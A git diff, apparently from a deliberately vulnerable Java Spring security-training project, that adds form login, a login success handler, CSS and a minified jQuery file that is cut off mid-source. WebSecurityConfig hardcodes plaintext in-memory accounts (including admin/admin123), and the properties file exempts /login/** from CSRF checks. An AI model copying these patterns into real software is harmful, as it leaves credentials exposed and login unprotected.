--- /dev/null
+++ b/src/main/java/org/joychou/security/LoginSuccessHandler.java
@@ -0,0 +1,30 @@
+package org.joychou.security;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.http.MediaType;
+import org.springframework.security.core.Authentication;
+import org.springframework.security.web.authentication.AuthenticationSuccessHandler;
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+
+
+public class LoginSuccessHandler implements AuthenticationSuccessHandler {
+
+    private final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+    @Override
+    public void onAuthenticationSuccess(HttpServletRequest request,
+                                        HttpServletResponse response, Authentication authentication)
+                                        throws ServletException, IOException {
+
+        logger.info("USER : " + authentication.getName()+ " LOGIN success!");
+
+        // google ajax and sendRedirect
+        response.setContentType(MediaType.APPLICATION_JSON_VALUE);
+        response.getWriter().write("{\"code\":1,\"message\":\"Login success!\"}");
+    }
+}
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 63de75d8..edab9ab7 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -1,7 +1,5 @@
 package org.joychou.security;
 
-
-
 import java.net.URI;
 
 public class SecurityUtil {
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index 5ad22e2b..127115f3 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -1,7 +1,9 @@
 package org.joychou.security;
 
+import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.context.annotation.Configuration;
+import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
 import org.springframework.security.config.annotation.web.builders.HttpSecurity;
 import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
 import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
@@ -47,15 +49,34 @@ public boolean matches(HttpServletRequest request) {
 
     @Override
     protected void configure(HttpSecurity http) throws Exception {
-        // http.csrf().disable()  // 去掉csrf校验
         // 默认token存在session里，用CookieCsrfTokenRepository改为token存在cookie里。
         // 但存在后端多台服务器情况，session不能同步的问题，所以一般使用cookie模式。
         http.csrf()
                 .requireCsrfProtectionMatcher(csrfRequestMatcher)
                 .ignoringAntMatchers(csrfExcludeUrl)  // 不进行csrf校验的uri，多个uri使用逗号分隔
                 .csrfTokenRepository(new CookieCsrfTokenRepository());
-        // 自定义csrf校验失败的代码，默认是返回403错误页面
         http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler());
         // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
+
+        // spring security login settings
+        http.authorizeRequests()
+                .antMatchers("/css/**", "/js/**").permitAll() // permit static resources
+                .anyRequest().authenticated().and() // any request authenticated except above static resources
+                .formLogin().loginPage("/login").permitAll() // permit all to access /login page
+                .successHandler(new LoginSuccessHandler())
+                .failureHandler(new LoginFailureHandler()).and()
+                .logout().logoutUrl("/logout").permitAll().and()
+                .rememberMe(); // tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会话将过期。为了解决这一问题，引入rememberMe功能。
+    }
+
+    @Autowired
+    public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
+        auth
+                .inMemoryAuthentication()
+                .withUser("joychou").password("joychou123").roles("USER").and()
+                .withUser("admin").password("admin123").roles("USER", "ADMIN");
     }
-}
\ No newline at end of file
+
+}
+
+
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 9cf68432..8ba9a9b3 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -24,7 +24,7 @@ joychou.security.referer.uri = /jsonp/**
 # csrf token check
 joychou.security.csrf.enabled = true
 # URI without CSRF check (only support ANT url format)
-joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**
+joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /login/**
 # method for CSRF check
 joychou.security.csrf.method = POST
 ### csrf configuration ends ###
diff --git a/src/main/resources/static/css/login.css b/src/main/resources/static/css/login.css
new file mode 100644
index 00000000..26401f4e
--- /dev/null
+++ b/src/main/resources/static/css/login.css
@@ -0,0 +1,106 @@
+.login-page {
+    width: 360px;
+    padding: 8% 0 0;
+    margin: auto;
+}
+.form {
+    position: relative;
+    z-index: 1;
+    background: #ffffff;
+    max-width: 360px;
+    margin: 0 auto 100px;
+    padding: 45px;
+    text-align: center;
+    box-shadow: 0 0 20px 0 rgba(0, 0, 0, 0.2), 0 5px 5px 0 rgba(0, 0, 0, 0.24);
+}
+.form input {
+    outline: 0;
+    background: #f2f2f2;
+    width: 100%;
+    border: 0;
+    margin: 0 0 15px;
+    padding: 15px;
+    box-sizing: border-box;
+    font-size: 14px;
+}
+.form button {
+    text-transform: uppercase;
+    outline: 0;
+    background: #4caf50;
+    width: 100%;
+    border: 0;
+    padding: 15px;
+    color: #ffffff;
+    font-size: 14px;
+    -webkit-transition: all 0.3 ease;
+    transition: all 0.3 ease;
+    cursor: pointer;
+}
+.form button:hover,
+.form button:active,
+.form button:focus {
+    background: #43a047;
+}
+.form .message {
+    margin: 15px 0 0;
+    color: #b3b3b3;
+    font-size: 12px;
+}
+.form .message a {
+    color: #4caf50;
+    text-decoration: none;
+}
+.form .register-form {
+    display: none;
+}
+.form p {
+    text-align: left;
+    margin: 0;
+    font-size: 13px;
+}
+.form p input {
+    width: auto;
+    margin-right: 10px;
+}
+.container {
+    position: relative;
+    z-index: 1;
+    max-width: 300px;
+    margin: 0 auto;
+}
+.container:before,
+.container:after {
+    content: "";
+    display: block;
+    clear: both;
+}
+.container .info {
+    margin: 50px auto;
+    text-align: center;
+}
+.container .info h1 {
+    margin: 0 0 15px;
+    padding: 0;
+    font-size: 36px;
+    font-weight: 300;
+    color: #1a1a1a;
+}
+.container .info span {
+    color: #4d4d4d;
+    font-size: 12px;
+}
+.container .info span a {
+    color: #000000;
+    text-decoration: none;
+}
+.container .info span .fa {
+    color: #ef3b3a;
+}
+body {
+    background: #76b852; /* fallback for old browsers */
+    background: -webkit-linear-gradient(right, #76b852, #8dc26f);
+    background: -moz-linear-gradient(right, #76b852, #8dc26f);
+    background: -o-linear-gradient(right, #76b852, #8dc26f);
+    background: linear-gradient(to left, #76b852, #8dc26f);
+    font-family: Lato,"PingFang SC","Microsoft YaHei",sans-serif;
+}
diff --git a/src/main/resources/static/js/jquery-1.11.1.min.js b/src/main/resources/static/js/jquery-1.11.1.min.js
new file mode 100644
index 00000000..88a5832a
--- /dev/null
+++ b/src/main/resources/static/js/jquery-1.11.1.min.js
@@ -0,0 +1,4 @@
+/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */
+!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||m.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(e=arguments[h]))for(d in e)a=g[d],c=e[d],g!==c&&(j&&c&&(m.isPlainObject(c)||(b=m.isArray(c)))?(b?(b=!1,f=a&&m.isArray(a)?a:[]):f=a&&m.isPlainObject(a)?a:{},g[d]=m.extend(j,f,c)):void 0!==c&&(g[d]=c));return g},m.extend({expando:"jQuery"+(l+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===m.type(a)},isArray:Array.isArray||function(a){return"array"===m.type(a)},isWindow:function(a){return null!=a&&a==a.window},isNumeric:function(a){return!m.isArray(a)&&a-parseFloat(a)>=0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},isPlainObject:function(a){var b;if(!a||"object"!==m.type(a)||a.nodeType||m.isWindow(a))return!1;try{if(a.constructor&&!j.call(a,"constructor")&&!j.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}if(k.ownLast)for(b in a)return j.call(a,b);for(b in a);return void 0===b||j.call(a,b)},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(b){b&&m.trim(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(o,"ms-").replace(p,q)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=r(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(n,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(r(Object(a))?m.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){var d;if(b){if(g)return g.call(b,a,c);for(d=b.length,c=c?0>c?Math.max(0,d+c):c:0;d>c;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,b){var c=+b.length,d=0,e=a.length;while(c>d)a[e++]=b[d++];if(c!==c)while(void 0!==b[d])a[e++]=b[d++];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=r(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(f=a[b],b=a,a=f),m.isFunction(a)?(c=d.call(arguments,2),e=function(){return a.apply(b||this,c.concat(d.call(arguments)))},e.guid=a.guid=a.guid||m.guid++,e):void 0},now:function(){return+new Date},support:k}),m.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+"]"]=b.toLowerCase()});function r(a){var b=a.length,c=m.type(a);return"function"===c||m.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var s=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+-new Date,v=a.document,w=0,x=0,y=gb(),z=gb(),A=gb(),B=function(a,b){return a===b&&(l=!0),0},C="undefined",D=1<<31,E={}.hasOwnProperty,F=[],G=F.pop,H=F.push,I=F.push,J=F.slice,K=F.indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(this[b]===a)return b;return-1},L="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",N="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",O=N.replace("w","w#"),P="\\["+M+"*("+N+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+O+"))|)"+M+"*\\]",Q=":("+N+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+P+")*)|.*)\\)|)",R=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),S=new RegExp("^"+M+"*,"+M+"*"),T=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp("="+M+"*([^\\]'\"]*?)"+M+"*\\]","g"),V=new RegExp(Q),W=new RegExp("^"+O+"$"),X={ID:new RegExp("^#("+N+")"),CLASS:new RegExp("^\\.("+N+")"),TAG:new RegExp("^("+N.replace("w","w*")+")"),ATTR:new RegExp("^"+P),PSEUDO:new RegExp("^"+Q),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+L+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/^(?:input|select|textarea|button)$/i,Z=/^h\d$/i,$=/^[^{]+\{\s*\[native \w/,_=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ab=/[+~]/,bb=/'|\\/g,cb=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),db=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)};try{I.apply(F=J.call(v.childNodes),v.childNodes),F[v.childNodes.length].nodeType}catch(eb){I={apply:F.length?function(a,b){H.apply(a,J.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fb(a,b,d,e){var f,h,j,k,l,o,r,s,w,x;if((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,d=d||[],!a||"string"!=typeof a)return d;if(1!==(k=b.nodeType)&&9!==k)return[];if(p&&!e){if(f=_.exec(a))if(j=f[1]){if(9===k){if(h=b.getElementById(j),!h||!h.parentNode)return d;if(h.id===j)return d.push(h),d}else if(b.ownerDocument&&(h=b.ownerDocument.getElementById(j))&&t(b,h)&&h.id===j)return d.push(h),d}else{if(f[2])return I.apply(d,b.getElementsByTagName(a)),d;if((j=f[3])&&c.getElementsByClassName&&b.getElementsByClassName)return I.apply(d,b.getElementsByClassName(j)),d}if(c.qsa&&(!q||!q.test(a))){if(s=r=u,w=b,x=9===k&&a,1===k&&"object"!==b.nodeName.toLowerCase()){o=g(a),(r=b.getAttribute("id"))?s=r.replace(bb,"\\$&"):b.setAttribute("id",s),s="[id='"+s+"'] ",l=o.length;while(l--)o[l]=s+qb(o[l]);w=ab.test(a)&&ob(b.parentNode)||b,x=o.join(",")}if(x)try{return I.apply(d,w.querySelectorAll(x)),d}catch(y){}finally{r||b.removeAttribute("id")}}}return i(a.replace(R,"$1"),b,d,e)}function gb(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function hb(a){return a[u]=!0,a}function ib(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function jb(a,b){var c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function kb(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||D)-(~a.sourceIndex||D);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function lb(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function mb(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function nb(a){return hb(function(b){return b=+b,hb(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function ob(a){return a&&typeof a.getElementsByTagName!==C&&a}c=fb.support={},f=fb.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=fb.setDocument=function(a){var b,e=a?a.ownerDocument||a:v,g=e.defaultView;return e!==n&&9===e.nodeType&&e.documentElement?(n=e,o=e.documentElement,p=!f(e),g&&g!==g.top&&(g.addEventListener?g.addEventListener("unload",function(){m()},!1):g.attachEvent&&g.attachEvent("onunload",function(){m()})),c.attributes=ib(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=ib(function(a){return a.appendChild(e.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=$.test(e.getElementsByClassName)&&ib(function(a){return a.innerHTML="<div class='a'></div><div class='a i'></div>",a.firstChild.className="i",2===a.getElementsByClassName("i").length}),c.getById=ib(function(a){return o.appendChild(a).id=u,!e.getElementsByName||!e.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if(typeof b.getElementById!==C&&p){var c=b.getElementById(a);return c&&c.parentNode?[c]:[]}},d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){var c=typeof a.getAttributeNode!==C&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return typeof b.getElementsByTagName!==C?b.getElementsByTagName(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return typeof b.getElementsByClassName!==C&&p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=$.test(e.querySelectorAll))&&(ib(function(a){a.innerHTML="<select msallowclip=''><option selected=''></option></select>",a.querySelectorAll("[msallowclip^='']").length&&q.push("[*^$]="+M+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+M+"*(?:value|"+L+")"),a.querySelectorAll(":checked").length||q.push(":checked")}),ib(function(a){var b=e.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+M+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=$.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ib(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",Q)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=$.test(o.compareDocumentPosition),t=b||$.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===e||a.ownerDocument===v&&t(v,a)?-1:b===e||b.ownerDocument===v&&t(v,b)?1:k?K.call(k,a)-K.call(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,f=a.parentNode,g=b.parentNode,h=[a],i=[b];if(!f||!g)return a===e?-1:b===e?1:f?-1:g?1:k?K.call(k,a)-K.call(k,b):0;if(f===g)return kb(a,b);c=a;while(c=c.parentNode)h.unshift(c);c=b;while(c=c.parentNode)i.unshift(c);while(h[d]===i[d])d++;return d?kb(h[d],i[d]):h[d]===v?-1:i[d]===v?1:0},e):n},fb.matches=function(a,b){return fb(a,null,null,b)},fb.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return fb(b,n,null,[a]).length>0},fb.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},fb.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&E.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},fb.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},fb.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=fb.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=fb.selectors={cacheLength:50,createPseudo:hb,match:X,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(cb,db),a[3]=(a[3]||a[4]||a[5]||"").replace(cb,db),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||fb.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&fb.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return X.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&V.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(cb,db).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+M+")"+a+"("+M+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||typeof a.getAttribute!==C&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=fb.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h;if(q){if(f){while(p){l=b;while(l=l[p])if(h?l.nodeName.toLowerCase()===r:1===l.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){k=q[u]||(q[u]={}),j=k[a]||[],n=j[0]===w&&j[1],m=j[0]===w&&j[2],l=n&&q.childNodes[n];while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if(1===l.nodeType&&++m&&l===b){k[a]=[w,n,m];break}}else if(s&&(j=(b[u]||(b[u]={}))[a])&&j[0]===w)m=j[1];else while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if((h?l.nodeName.toLowerCase()===r:1===l.nodeType)&&++m&&(s&&((l[u]||(l[u]={}))[a]=[w,m]),l===b))break;return m-=e,m===d||m%d===0&&m/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||fb.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?hb(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=K.call(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:hb(function(a){var b=[],c=[],d=h(a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contains:hb(function(a){return function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:hb(function(a){return W.test(a||"")||fb.error("unsupported lang: "+a),a=a.replace(cb,db).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Z.test(a.nodeName)},input:function(a){return Y.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:nb(function(){return[0]}),last:nb(function(a,b){return[b-1]}),eq:nb(function(a,b,c){return[0>c?c+b:c]}),even:nb(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:nb(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:nb(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:nb(function(a,b,c){for(var d=0>c?c+b:c;++d<b;)a.push(d);return a})}},d.pseudos.nth=d.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})d.pseudos[b]=lb(b);for(b in{submit:!0,reset:!0})d.pseudos[b]=mb(b);function pb(){}pb.prototype=d.filters=d.pseudos,d.setFilters=new pb,g=fb.tokenize=function(a,b){var c,e,f,g,h,i,j,k=z[a+" "];if(k)return b?0:k.slice(0);h=a,i=[],j=d.preFilter;while(h){(!c||(e=S.exec(h)))&&(e&&(h=h.slice(e[0].length)||h),i.push(f=[])),c=!1,(e=T.exec(h))&&(c=e.shift(),f.push({value:c,type:e[0].replace(R," ")}),h=h.slice(c.length));for(g in d.filter)!(e=X[g].exec(h))||j[g]&&!(e=j[g](e))||(c=e.shift(),f.push({value:c,type:g,matches:e}),h=h.slice(c.length));if(!c)break}return b?h.length:h?fb.error(a):z(a,i).slice(0)};function qb(a){for(var b=0,c=a.length,d="";c>b;b++)d+=a[b].value;return d}function rb(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(i=b[u]||(b[u]={}),(h=i[d])&&h[0]===w&&h[1]===f)return j[2]=h[2];if(i[d]=j,j[2]=a(b,c,g))return!0}}}function sb(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function tb(a,b,c){for(var d=0,e=b.length;e>d;d++)fb(a,b[d],c);return c}function ub(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(!c||c(f,d,e))&&(g.push(f),j&&b.push(h));return g}function vb(a,b,c,d,e,f){return d&&!d[u]&&(d=vb(d)),e&&!e[u]&&(e=vb(e,f)),hb(function(f,g,h,i){var 